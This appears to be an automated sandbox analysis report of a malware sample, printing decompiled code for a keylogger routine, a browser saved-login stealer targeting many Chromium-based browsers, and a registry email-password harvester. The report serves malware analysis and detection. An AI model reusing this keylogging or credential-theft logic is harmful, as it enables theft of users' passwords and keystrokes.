                                                                    • Instruction ID: 756c431b447089d5f47eba41a5039d9bfc50b9477e43a158fae2a1225123c5c0
                                                                    • Opcode Fuzzy Hash: 31ed34bdb0f454a13f8c8e3eb9cc1091eee06edbb065cea15b4a93608686c7e4
                                                                    • Instruction Fuzzy Hash: 8691F935F06270FBF928C599B2583766212EBA0209F524916DD87F7F90D7128D4CFAD2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E02D1902E(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                    				char _v524;
                                                                    				short _v564;
                                                                    				intOrPtr _v568;
                                                                    				short _v570;
                                                                    				short _v572;
                                                                    				long _v596;
                                                                    				char _v600;
                                                                    				int _v604;
                                                                    				char _v612;
                                                                    				intOrPtr _v616;
                                                                    				struct _OVERLAPPED* _v620;
                                                                    				char _v624;
                                                                    				char _v628;
                                                                    				void* _v632;
                                                                    				char _v636;
                                                                    				intOrPtr _v640;
                                                                    				struct _OVERLAPPED* _v644;
                                                                    				char _v648;
                                                                    				void* _t76;
                                                                    				short _t77;
                                                                    				void* _t82;
                                                                    				char* _t84;
                                                                    				struct _OVERLAPPED** _t86;
                                                                    				long _t88;
                                                                    				intOrPtr _t93;
                                                                    				intOrPtr* _t96;
                                                                    				long _t100;
                                                                    				intOrPtr _t101;
                                                                    				WCHAR* _t102;
                                                                    				intOrPtr _t104;
                                                                    				void* _t105;
                                                                    				long _t109;
                                                                    				void* _t110;
                                                                    				intOrPtr _t111;
                                                                    				intOrPtr _t113;
                                                                    				long _t116;
                                                                    				intOrPtr _t117;
                                                                    				intOrPtr _t119;
                                                                    				long _t121;
                                                                    				intOrPtr _t122;
                                                                    				intOrPtr _t124;
                                                                    				void* _t126;
                                                                    				intOrPtr _t128;
                                                                    				intOrPtr _t130;
                                                                    				long _t132;
                                                                    				intOrPtr _t133;
                                                                    				intOrPtr _t135;
                                                                    				DWORD* _t136;
                                                                    				long _t137;
                                                                    				intOrPtr _t138;
                                                                    				long _t142;
                                                                    				void* _t152;
                                                                    				long _t164;
                                                                    				intOrPtr _t178;
                                                                    				intOrPtr _t189;
                                                                    				void* _t195;
                                                                    				struct _OVERLAPPED* _t198;
                                                                    				struct _OVERLAPPED* _t201;
                                                                    				void* _t204;
                                                                    				void* _t206;
                                                                    				void* _t208;
                                                                    				signed int _t209;
                                                                    				void* _t212;
                                                                    				void* _t213;
                                                                    
                                                                    				_t198 = 0;
                                                                    				_v600 = 0;
                                                                    				E02D11052( &_v524, 0, 0x208);
                                                                    				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
                                                                    				_t201 = 0;
                                                                    				_v604 = 0;
                                                                    				_t76 = _a8 - 1;
                                                                    				if(_t76 == 0) {
                                                                    					_t77 = 6;
                                                                    					_v570 = _t77;
                                                                    					__eflags = 1;
                                                                    					_v564 = _a4;
                                                                    					_v568 = 0x130;
                                                                    					_v572 = 1;
                                                                    					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
                                                                    				} else {
                                                                    					_t82 = _t76 - 0xf;
                                                                    					if(_t82 == 0) {
                                                                    						PostQuitMessage(0);
                                                                    					} else {
                                                                    						if(_t82 == 0xef) {
                                                                    							_t84 =  &_v600;
                                                                    							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
                                                                    							__eflags = _t84 - 0xffffffff;
                                                                    							if(_t84 != 0xffffffff) {
                                                                    								_t164 = E02D15F53(_v620);
                                                                    								_v596 = _t164;
                                                                    								__eflags = _t164;
                                                                    								if(_t164 != 0) {
                                                                    									_t86 =  &_v620;
                                                                    									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
                                                                    									__eflags = _t86 - _v640;
                                                                    									if(_t86 == _v640) {
                                                                    										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
                                                                    										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
                                                                    											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
                                                                    											__eflags = _t88;
                                                                    											if(_t88 <= 0) {
                                                                    												E02D132FF( &_v644, _t195, L"Unknow");
                                                                    											} else {
                                                                    												E02D13437( &_v648, E02D135E5( &_v636,  &_v564));
                                                                    												E02D15EA5(_v644);
                                                                    											}
                                                                    											E02D194AE( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
                                                                    											E02D13437( &_v632,  &_v644);
                                                                    											_t93 =  *0x2d296a0; // 0x0
                                                                    											E02D1346A( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
                                                                    											_t96 =  *0x2d296a0; // 0x0
                                                                    											__eflags =  *_t96 - _t198;
                                                                    											if( *_t96 != _t198) {
                                                                    												_t213 = _t212 - 0x10;
                                                                    												__eflags = _t96 + 0xa18;
                                                                    												E02D11361(_t213, _t96 + 0xa18, _t96 + 0xa18);
                                                                    												_t208 = _t213 - 0x10;
                                                                    												E02D1362D(_t208,  &_v636);
                                                                    												 *((intOrPtr*)(_t208 + 4)) = _v636;
                                                                    												 *((short*)(_t208 + 8)) = _v632;
                                                                    												E02D1362D(_t208 + 0xc,  &_v628);
                                                                    												_t152 = E02D149AB( &_v612, __eflags);
                                                                    												_t189 =  *0x2d296a0; // 0x0
                                                                    												E02D14F2B( *((intOrPtr*)(_t189 + 0xa50)), _t152);
                                                                    												E02D14981( &_v648);
                                                                    												_t96 =  *0x2d296a0; // 0x0
                                                                    											}
                                                                    											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
                                                                    											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
                                                                    												_t100 = lstrlenW(_t96 + 0x210);
                                                                    												__eflags = _t100;
                                                                    												_t101 =  *0x2d296a0; // 0x0
                                                                    												if(_t100 == 0) {
                                                                    													L17:
                                                                    													_t102 = _t101 + 0x210;
                                                                    													__eflags = _t102;
                                                                    													lstrcpyW(_t102, _v632);
                                                                    													_t104 =  *0x2d296a0; // 0x0
                                                                    													 *(_t104 + 0xa10) = _t198;
                                                                    												} else {
                                                                    													_t142 = E02D13248( &_v648, E02D135E5( &_v636, _t101 + 0x210));
                                                                    													E02D15EA5(_v644);
                                                                    													_t101 =  *0x2d296a0; // 0x0
                                                                    													_v644 = _t198;
                                                                    													__eflags = _t142;
                                                                    													if(_t142 == 0) {
                                                                    														goto L17;
                                                                    													} else {
                                                                    														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
                                                                    													}
                                                                    												}
                                                                    												_t105 = CreateFileW( *(_t104 + 0xc), 4, 1, _t198, 4, 0x80, _t198);
                                                                    												_t178 =  *0x2d296a0; // 0x0
                                                                    												 *(_t178 + 4) = _t105;
                                                                    												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
                                                                    												if(__eflags == 0) {
                                                                    													_t49 = _t178 + 8; // 0x8
                                                                    													_t204 = L"\r\n";
                                                                    													_t116 = lstrlenW(_t204);
                                                                    													_t117 =  *0x2d296a0; // 0x0
                                                                    													WriteFile( *(_t117 + 4), _t204, _t116, _t49, _t198);
                                                                    													_t119 =  *0x2d296a0; // 0x0
                                                                    													_t121 = lstrlenW(_t204);
                                                                    													_t122 =  *0x2d296a0; // 0x0
                                                                    													WriteFile( *(_t122 + 4), _t204, _t121, _t119 + 8, _t198);
                                                                    													_t124 =  *0x2d296a0; // 0x0
                                                                    													_t126 = E02D13261( &_v632);
                                                                    													_t128 =  *0x2d296a0; // 0x0
                                                                    													WriteFile( *(_t128 + 4), _v632, _t126 + _t126, _t124 + 8, _t198);
                                                                    													_t130 =  *0x2d296a0; // 0x0
                                                                    													_t206 = L"\r\n";
                                                                    													_t132 = lstrlenW(_t206);
                                                                    													_t133 =  *0x2d296a0; // 0x0
                                                                    													WriteFile( *(_t133 + 4), _t206, _t132, _t130 + 8, _t198);
                                                                    													_t135 =  *0x2d296a0; // 0x0
                                                                    													_t136 = _t135 + 8;
                                                                    													__eflags = _t136;
                                                                    													_t137 = lstrlenW(_t206);
                                                                    													_t138 =  *0x2d296a0; // 0x0
                                                                    													WriteFile( *(_t138 + 4), _t206, _t137, _t136, _t198);
                                                                    													_t178 =  *0x2d296a0; // 0x0
                                                                    												}
                                                                    												_t58 = _t178 + 8; // 0x8
                                                                    												_t109 = lstrlenW(E02D193C8( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
                                                                    												__eflags = _t109;
                                                                    												_t110 = E02D193C8( *((intOrPtr*)(_v616 + 0x16)), _t109);
                                                                    												_t111 =  *0x2d296a0; // 0x0
                                                                    												WriteFile( *(_t111 + 4), _t110, _t109, _t58, _t198);
                                                                    												_t113 =  *0x2d296a0; // 0x0
                                                                    												CloseHandle( *(_t113 + 4));
                                                                    											}
                                                                    											E02D15EA5(_v620);
                                                                    											_v620 = _t198;
                                                                    											E02D15EA5(_v632);
                                                                    											_t201 = _v644;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						} else {
                                                                    							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				E02D15EA5(_t201);
                                                                    				return _t198;
                                                                    			}

                                                                    Instruction address column (one entry per decompiled statement above, alignment lost in extraction): 0x02d1903d to 0x02d193c5

                                                                    APIs
                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 02D19084
                                                                    • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 02D190A1
                                                                    • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 02D190D7
                                                                    • GetForegroundWindow.USER32 ref: 02D190F4
                                                                    • GetWindowTextW.USER32 ref: 02D19105
                                                                    • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 02D191EE
                                                                    • PostQuitMessage.USER32(00000000), ref: 02D19381
                                                                    • RegisterRawInputDevices.USER32 ref: 02D193B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                                                    • String ID: Unknow
                                                                    • API String ID: 3853268301-1240069140
                                                                    • Opcode ID: a6680180a979e3d5491c4efb273093091dea20fedce9104075e334963d921106
                                                                    • Instruction ID: 08ebe8da86ecd784272b7686c8544d347d6a57fa0896f71096a18ae4d9ceb1a0
                                                                    • Opcode Fuzzy Hash: a6680180a979e3d5491c4efb273093091dea20fedce9104075e334963d921106
                                                                    • Instruction Fuzzy Hash: 58A1CC71904240AFC720EF64ECA8EAA7BE9FFA9305F414858F88583390CB31DD18CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			E02D1C1B2(void* __edx, intOrPtr _a4) {
                                                                    				char _v48;
                                                                    				char _v56;
                                                                    				char _v60;
                                                                    				char _v324;
                                                                    				intOrPtr _v328;
                                                                    				char _v332;
                                                                    				char _v336;
                                                                    				char _v340;
                                                                    				char _v344;
                                                                    				intOrPtr _v352;
                                                                    				void* _t31;
                                                                    				intOrPtr* _t59;
                                                                    				intOrPtr* _t66;
                                                                    				intOrPtr _t67;
                                                                    				intOrPtr _t72;
                                                                    				intOrPtr _t73;
                                                                    				intOrPtr* _t76;
                                                                    				intOrPtr* _t78;
                                                                    				intOrPtr* _t80;
                                                                    				intOrPtr* _t84;
                                                                    				intOrPtr* _t86;
                                                                    				intOrPtr* _t88;
                                                                    				intOrPtr* _t90;
                                                                    				intOrPtr* _t92;
                                                                    				intOrPtr* _t94;
                                                                    				intOrPtr* _t96;
                                                                    				intOrPtr* _t98;
                                                                    				intOrPtr* _t100;
                                                                    				intOrPtr* _t102;
                                                                    				intOrPtr* _t104;
                                                                    				intOrPtr* _t106;
                                                                    				intOrPtr* _t108;
                                                                    				intOrPtr* _t110;
                                                                    				intOrPtr* _t112;
                                                                    				intOrPtr* _t114;
                                                                    				intOrPtr* _t117;
                                                                    				intOrPtr* _t120;
                                                                    				intOrPtr _t126;
                                                                    				void* _t134;
                                                                    				void* _t135;
                                                                    				intOrPtr _t139;
                                                                    				signed int _t140;
                                                                    				void* _t142;
                                                                    
                                                                    				_t133 = __edx;
                                                                    				_t142 = (_t140 & 0xfffffff8) - 0x34;
                                                                    				_t72 = _a4;
                                                                    				 *0x2d296a4 = _t72;
                                                                    				_t73 =  *((intOrPtr*)(_t72 + 4));
                                                                    				E02D237A8(_t73, __edx,  &_v48,  *((intOrPtr*)(_t72 + 8)), 0);
                                                                    				_t143 = _v56;
                                                                    				if(_v56 != 0) {
                                                                    					_push(_t73);
                                                                    					E02D1304C(_t142,  &_v48);
                                                                    					_t76 =  *0x2d296a4; // 0x0
                                                                    					E02D19FB3( *_t76, _t133, _t73);
                                                                    					_t78 =  *0x2d296a4; // 0x0
                                                                    					_t31 = E02D19FDA( *_t78, _t143);
                                                                    					_t144 = _t31;
                                                                    					if(_t31 != 0) {
                                                                    						_t134 = 0x1a;
                                                                    						E02D1F76B( &_v56, _t134, _t144);
                                                                    						_t135 = 0x1a;
                                                                    						E02D1F76B( &_v60, _t135, _t144);
                                                                    						_t84 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t84, _t144, L"\\Google\\Chrome\\User Data\\Default\\Login Data", L"\\Google\\Chrome\\User Data\\Local State", 0, 0, 1);
                                                                    						_t86 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t86, _t144, L"\\Epic Privacy Browser\\User Data\\Default\\Login Data", L"\\Epic Privacy Browser\\User Data\\Local State", 0, 0, 6);
                                                                    						_t88 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t88, _t144, L"\\Microsoft\\Edge\\User Data\\Default\\Login Data", L"\\Microsoft\\Edge\\User Data\\Local State", 0, 0, 7);
                                                                    						_t90 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t90, _t144, L"\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17", L"\\UCBrowser\\User Data_i18n\\Local State", 0, 1, 8);
                                                                    						_t92 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t92, _t144, L"\\Tencent\\QQBrowser\\User Data\\Default\\Login Data", L"\\Tencent\\QQBrowser\\User Data\\Local State", 0, 0, 9);
                                                                    						_t94 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t94, _t144, L"\\Opera Software\\Opera Stable\\Login Data", L"\\Opera Software\\Opera Stable\\Local State", 1, 0, 0xa);
                                                                    						_t96 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t96, _t144, L"\\Blisk\\User Data\\Default\\Login Data", L"\\Blisk\\User Data\\Local State", 0, 0, 0xb);
                                                                    						_t98 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t98, _t144, L"\\Chromium\\User Data\\Default\\Login Data", L"\\Chromium\\User Data\\Local State", 0, 0, 0xc);
                                                                    						_t100 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t100, _t144, L"\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data", L"\\BraveSoftware\\Brave-Browser\\User Data\\Local State", 0, 0, 0xd);
                                                                    						_t102 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t102, _t144, L"\\Vivaldi\\User Data\\Default\\Login Data", L"\\Vivaldi\\User Data\\Local State", 0, 0, 0xe);
                                                                    						_t104 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t104, _t144, L"\\Comodo\\Dragon\\User Data\\Default\\Login Data", L"\\Comodo\\Dragon\\User Data\\Local State", 0, 0, 0xf);
                                                                    						_t106 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t106, _t144, L"\\Torch\\User Data\\Default\\Login Data", L"\\Torch\\User Data\\Local State", 0, 0, 0x10);
                                                                    						_t108 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t108, _t144, L"\\Slimjet\\User Data\\Default\\Login Data", L"\\Slimjet\\User Data\\Local State", 0, 0, 0x11);
                                                                    						_t110 =  *0x2d296a4; // 0x0
                                                                    						E02D1C4A8( *_t110, _t144, L"\\CentBrowser\\User Data\\Default\\Login Data", L"\\CentBrowser\\User Data\\Local State", 0, 0, 0x12);
                                                                    						_t112 =  *0x2d296a4; // 0x0
                                                                    						E02D1B203( *_t112, _t135, _t144);
                                                                    						_t114 =  *0x2d296a4; // 0x0
                                                                    						E02D1A0D8( *_t114, _t135, _t144);
                                                                    						E02D1362D(_t142,  &_v340);
                                                                    						_t117 =  *0x2d296a4; // 0x0
                                                                    						E02D1A6C8( *_t117, _t144,  *_t114);
                                                                    						E02D1362D(_t142,  &_v344);
                                                                    						_t120 =  *0x2d296a4; // 0x0
                                                                    						E02D1AC0A( *_t120, _t144,  *_t117);
                                                                    						E02D19F71(_t144);
                                                                    						_t59 =  *0x2d296a4; // 0x0
                                                                    						E02D12093( &_v340, _t144,  *_t59);
                                                                    						_v328 = 0x2d274a4;
                                                                    						E02D12093( &_v324, _t144,  &_v344);
                                                                    						_t126 =  *0x2d296a4; // 0x0
                                                                    						E02D14F2B( *((intOrPtr*)(_t126 + 8)),  &_v332);
                                                                    						E02D23416( &_v336);
                                                                    						_t129 = _v352;
                                                                    						if(_v352 != 0) {
                                                                    							E02D11A7E(_t129, _t129);
                                                                    						}
                                                                    						_t66 =  *0x2d296a4; // 0x0
                                                                    						_t67 =  *_t66;
                                                                    						_t130 =  *((intOrPtr*)(_t67 + 0x10));
                                                                    						if( *((intOrPtr*)(_t67 + 0x10)) != 0) {
                                                                    							E02D15EA5(_t130);
                                                                    						}
                                                                    						E02D15EA5(_v60);
                                                                    						E02D15EA5(_v56);
                                                                    					}
                                                                    					_t80 =  *0x2d296a4; // 0x0
                                                                    					_t139 =  *_t80;
                                                                    					E02D15EEE(_t80);
                                                                    					_t22 = _t139 + 0x24; // 0x24
                                                                    					E02D11F76(_t22);
                                                                    				}
                                                                    				E02D13036( &_v48);
                                                                    				return 0;
                                                                    			}
                                                                    Instruction address column (one entry per decompiled statement above, alignment lost in extraction): starts at 0x02d1c1b2; entries shown run to 0x02d1c43e
                                                                    0x02d1c443
                                                                    0x02d1c449
                                                                    0x02d1c44c
                                                                    0x02d1c44c
                                                                    0x02d1c451
                                                                    0x02d1c456
                                                                    0x02d1c458
                                                                    0x02d1c45d
                                                                    0x02d1c45f
                                                                    0x02d1c45f
                                                                    0x02d1c468
                                                                    0x02d1c471
                                                                    0x02d1c471
                                                                    0x02d1c476
                                                                    0x02d1c47c
                                                                    0x02d1c47e
                                                                    0x02d1c483
                                                                    0x02d1c486
                                                                    0x02d1c486
                                                                    0x02d1c48f
                                                                    0x02d1c49a

                                                                    Strings
                                                                    • \Epic Privacy Browser\User Data\Default\Login Data, xrefs: 02D1C256
                                                                    • \Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 02D1C2A8
                                                                    • \Vivaldi\User Data\Default\Login Data, xrefs: 02D1C330
                                                                    • \Slimjet\User Data\Local State, xrefs: 02D1C37C
                                                                    • \UCBrowser\User Data_i18n\Local State, xrefs: 02D1C288
                                                                    • \Comodo\Dragon\User Data\Local State, xrefs: 02D1C346
                                                                    • \Google\Chrome\User Data\Default\Login Data, xrefs: 02D1C23B
                                                                    • \Blisk\User Data\Local State, xrefs: 02D1C2DA
                                                                    • \CentBrowser\User Data\Local State, xrefs: 02D1C397
                                                                    • \Opera Software\Opera Stable\Login Data, xrefs: 02D1C2C4
                                                                    • \Microsoft\Edge\User Data\Local State, xrefs: 02D1C26C
                                                                    • \CentBrowser\User Data\Default\Login Data, xrefs: 02D1C39C
                                                                    • \UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 02D1C28D
                                                                    • \Blisk\User Data\Default\Login Data, xrefs: 02D1C2DF
                                                                    • \Torch\User Data\Default\Login Data, xrefs: 02D1C366
                                                                    • \Google\Chrome\User Data\Local State, xrefs: 02D1C236
                                                                    • \Chromium\User Data\Default\Login Data, xrefs: 02D1C2FA
                                                                    • \Vivaldi\User Data\Local State, xrefs: 02D1C329
                                                                    • \BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 02D1C310
                                                                    • \Torch\User Data\Local State, xrefs: 02D1C361
                                                                    • \Slimjet\User Data\Default\Login Data, xrefs: 02D1C381
                                                                    • \Microsoft\Edge\User Data\Default\Login Data, xrefs: 02D1C271
                                                                    • \Epic Privacy Browser\User Data\Local State, xrefs: 02D1C251
                                                                    • \Chromium\User Data\Local State, xrefs: 02D1C2F5
                                                                    • \Opera Software\Opera Stable\Local State, xrefs: 02D1C2BF
                                                                    • \BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 02D1C315
                                                                    • \Tencent\QQBrowser\User Data\Local State, xrefs: 02D1C2A3
                                                                    • \Comodo\Dragon\User Data\Default\Login Data, xrefs: 02D1C34B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FilePath$lstrcatlstrcpy$BinaryCopyExistsOpenType$CloseCombineEnumFolderInfoPrivateProfileQuerySpecialString
                                                                    • String ID: \Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
                                                                    • API String ID: 2377953819-4166025770
                                                                    • Opcode ID: 6fe197d108bea07319584c566a19f2216409f01466bf879a54fe723e4c390883
                                                                    • Instruction ID: 770c1f12de0bebebb8f7064fe6bb6f93f615040b61956686a2a2726175077b40
                                                                    • Opcode Fuzzy Hash: 6fe197d108bea07319584c566a19f2216409f01466bf879a54fe723e4c390883
                                                                    • Instruction Fuzzy Hash: 94719230794250BFE728EB60FD61EAA379AEFA6715F500459B4075BB90CA616C0CCF71
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			E02D1A29A(void* __ecx, void* __edx, void* __eflags, void* _a4) {
                                                                    				int _v8;
                                                                    				intOrPtr _v12;
                                                                    				char _v16;
                                                                    				char _v20;
                                                                    				char _v24;
                                                                    				char _v292;
                                                                    				char _v556;
                                                                    				char _v820;
                                                                    				char _v9012;
                                                                    				char _v17204;
                                                                    				long _t124;
                                                                    				long _t130;
                                                                    				long _t136;
                                                                    				long _t142;
                                                                    				void* _t180;
                                                                    				void* _t181;
                                                                    				void* _t199;
                                                                    				void* _t207;
                                                                    				void* _t208;
                                                                    				void* _t209;
                                                                    				void* _t210;
                                                                    				void* _t211;
                                                                    				void* _t212;
                                                                    				void* _t213;
                                                                    				void* _t214;
                                                                    				void* _t215;
                                                                    				void* _t216;
                                                                    				void* _t217;
                                                                    
                                                                    				_t199 = __edx;
                                                                    				_t181 = __ecx;
                                                                    				E02D11190(0x4334, __ecx);
                                                                    				_v8 = 0x1000;
                                                                    				_v24 = 0;
                                                                    				_v20 = 0;
                                                                    				_t180 = _t181;
                                                                    				_v16 = 0;
                                                                    				E02D11052( &_v292, 0, 0x104);
                                                                    				E02D11052( &_v556, 0, 0x104);
                                                                    				E02D11052( &_v820, 0, 0x104);
                                                                    				E02D11052( &_v9012, 0, _v8);
                                                                    				_t207 = _a4;
                                                                    				_t209 = _t208 + 0x30;
                                                                    				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
                                                                    					E02D132FF( &_v20, _t199,  &_v9012);
                                                                    				}
                                                                    				_v8 = 0x1000;
                                                                    				E02D11052( &_v9012, 0, 0x1000);
                                                                    				_t210 = _t209 + 0xc;
                                                                    				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
                                                                    					E02D132FF( &_v20, _t199,  &_v9012);
                                                                    				}
                                                                    				_v8 = 0x1000;
                                                                    				E02D11052( &_v9012, 0, 0x1000);
                                                                    				_t211 = _t210 + 0xc;
                                                                    				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
                                                                    					E02D132FF( &_v24, _t199,  &_v9012);
                                                                    				}
                                                                    				_v8 = 0x1000;
                                                                    				E02D11052( &_v9012, 0, 0x1000);
                                                                    				_t212 = _t211 + 0xc;
                                                                    				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
                                                                    					E02D132FF( &_v20, _t199,  &_v9012);
                                                                    				}
                                                                    				_v8 = 0x1000;
                                                                    				E02D11052( &_v9012, 0, 0x1000);
                                                                    				_t213 = _t212 + 0xc;
                                                                    				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
                                                                    					E02D132FF( &_v24, _t199,  &_v9012);
                                                                    				}
                                                                    				_v8 = 0x1000;
                                                                    				E02D11052( &_v9012, 0, 0x1000);
                                                                    				_t214 = _t213 + 0xc;
                                                                    				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
                                                                    				_t225 = _t124;
                                                                    				if(_t124 == 0) {
                                                                    					E02D11052( &_v17204, _t124, 0x1000);
                                                                    					E02D1A632( &_v9012,  &_v17204, _t225, _v8);
                                                                    					_t214 = _t214 + 0x10;
                                                                    					E02D132FF( &_v16,  &_v17204,  &_v17204);
                                                                    				}
                                                                    				_v8 = 0x1000;
                                                                    				E02D11052( &_v9012, 0, 0x1000);
                                                                    				_t215 = _t214 + 0xc;
                                                                    				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
                                                                    				_t226 = _t130;
                                                                    				if(_t130 == 0) {
                                                                    					E02D11052( &_v17204, _t130, 0x1000);
                                                                    					E02D1A632( &_v9012,  &_v17204, _t226, _v8);
                                                                    					_t215 = _t215 + 0x10;
                                                                    					E02D132FF( &_v16,  &_v17204,  &_v17204);
                                                                    				}
                                                                    				_v8 = 0x1000;
                                                                    				E02D11052( &_v9012, 0, 0x1000);
                                                                    				_t216 = _t215 + 0xc;
                                                                    				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
                                                                    				_t227 = _t136;
                                                                    				if(_t136 == 0) {
                                                                    					E02D11052( &_v17204, _t136, 0x1000);
                                                                    					E02D1A632( &_v9012,  &_v17204, _t227, _v8);
                                                                    					_t216 = _t216 + 0x10;
                                                                    					E02D132FF( &_v16,  &_v17204,  &_v17204);
                                                                    				}
                                                                    				_v8 = 0x1000;
                                                                    				E02D11052( &_v9012, 0, 0x1000);
                                                                    				_t217 = _t216 + 0xc;
                                                                    				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
                                                                    				_t228 = _t142;
                                                                    				if(_t142 == 0) {
                                                                    					E02D11052( &_v17204, _t142, 0x1000);
                                                                    					E02D1A632( &_v9012,  &_v17204, _t228, _v8);
                                                                    					_t217 = _t217 + 0x10;
                                                                    					E02D132FF( &_v16,  &_v17204,  &_v17204);
                                                                    				}
                                                                    				_v12 = 3;
                                                                    				if(E02D13261( &_v24) > 0) {
                                                                    					E02D11F95(_t217 - 0x10,  &_v24);
                                                                    					E02D11FCB(_t180);
                                                                    				}
                                                                    				E02D113EF( &_v24);
                                                                    				return 1;
                                                                    			}

                                                                    APIs
